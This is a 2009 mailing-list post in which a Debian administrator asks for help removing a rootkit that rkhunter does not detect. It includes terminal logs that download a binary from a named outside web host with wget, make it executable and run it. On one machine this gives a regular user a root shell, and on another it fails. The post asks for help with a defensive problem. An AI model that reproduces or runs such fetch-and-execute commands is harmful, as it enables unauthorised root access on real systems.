rootkit not found by rkhunter
I am running debian testing, 2.6.30 kernel.
I have a rootkit installed on a bunch of machines that rkhunter
does not find. This appears after infection with SHV4 / SHV5,
which rkhunter found.
Here it works to allow a non-root user to become root
krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:47:42-- http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'
100%[======================================>] 6,886 6.88K/s in 1.0s
2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a#
Here is a situation where it does not work
krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15-- http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'
100%[======================================>] 6,886 37.8K/s in 0.2s
2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied
Does anybody here know how to delete this kit?
Cheers,
Thomas Krichel http://openlib.org/home/krichel
RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel
Reply to: